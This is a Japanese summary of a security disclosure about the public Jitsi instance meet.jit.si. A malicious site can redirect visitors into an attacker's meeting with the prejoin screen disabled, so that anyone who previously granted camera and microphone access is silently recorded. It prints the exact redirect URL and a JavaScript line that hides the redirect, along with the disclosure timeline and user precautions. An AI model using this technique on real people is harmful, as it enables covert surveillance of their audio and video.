概要
- Jitsi の公開インスタンスに存在する セキュリティリスク の事例紹介
- 攻撃者 がユーザーの音声・映像を 無断取得 できる可能性
- Jitsi運営 はこれを「機能」として認識し、修正予定なし
- ユーザー自身によるセキュリティ対策 の重要性強調
- 公開事例 の経緯とディスクッションの呼びかけ
Jitsi公開インスタンスにおけるセキュリティリスク
- Jitsi はオープンソースの ウェブ会議アプリケーション
- meet.jit.si は誰でも利用できる 公開インスタンス、月間数百万ユーザー規模
- 攻撃者は MiniGinger という会議を公開インスタンス上に作成
- ユーザーが攻撃者管理の CuteCats.com へアクセスすると、裏で次のURLにリダイレクト
- https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false
- ユーザーが過去にJitsi会議で マイク・カメラ利用を許可 していた場合、 追加の操作なし でMiniGinger会議がバックグラウンドで実行
- これにより、攻撃者は ユーザーの音声・映像データ を 無断取得 可能
- さらに、JavaScriptを用いた ウィンドウ操作トリック でユーザーに気づかれにくくすることも可能
window.open(location.href)location.href= ('https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false')
Jitsi運営の対応と問題提起
- Jitsi運営 はこの挙動を「 機能」として認識、 修正予定なし と回答
- 特に 公開インスタンス でのリスクが高いことを指摘
- 利用者側での 自己防衛 策の必要性
- 少なくとも公開インスタンスでは無効化 すべきという提案
公開・ディスクロージャー経緯
- 2025年6月17日 :Jitsiに発見内容を報告
- 同日 :Jitsiから「 機能」との回答
- 6月18日 :公開議論の許可を問い合わせるも回答なし
- 7月23日 :1ヶ月以上返答なしのため本記事を 公開
- HackerNews での議論を呼びかけ
ユーザー向けセキュリティ対策
- Jitsi会議利用時、マイク・カメラの アクセス権限管理 の徹底
- 利用後は ブラウザの権限設定 で都度解除推奨
- 不審なサイト や 不明な会議URL へのアクセス回避
- 公開インスタンス利用時 は特に 注意喚起
- 公式コミュニティや セキュリティ議論 への参加推奨
まとめとディスカッションの呼びかけ
- Jitsi公開インスタンス の設計上の問題点
- 開発側とユーザー側 双方の意識向上の必要性
- 本件に関する 意見・議論 をコメント欄や HackerNews で募集